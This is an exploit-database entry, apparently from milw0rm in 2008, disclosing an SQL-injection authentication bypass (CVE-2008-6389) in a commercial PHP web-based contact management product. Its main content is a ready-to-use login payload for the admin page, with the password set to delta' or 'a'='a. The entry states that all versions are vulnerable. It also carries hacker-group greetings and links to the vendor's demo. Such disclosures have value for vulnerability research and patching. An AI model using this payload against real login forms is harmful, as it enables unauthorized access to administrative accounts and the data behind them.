Rae Media Contact MS - Authentication Bypass
Author: b3hz4d
type: webapps
platform: php
port:
date_added: 2008-12-02
date_updated: 2017-01-04
verified: 1
codes: OSVDB-50411;CVE-2008-6389
tags:
aliases:
screenshot_url:
application_url:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 03 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR : http://www.aliensoftcorp.com/
DEMO : http://www.aliensoftcorp.com/contactmanager.htm
#####################################################
[+] vuln :
Admin login page
All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
All Demo links are here:
http://www.aliensoftcorp.com/contactmanager.htm
[+] Exploit :
USER: anything
PASS: delta' or 'a'='a
##########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
##########################################################################################################
# milw0rm.com [2008-12-03]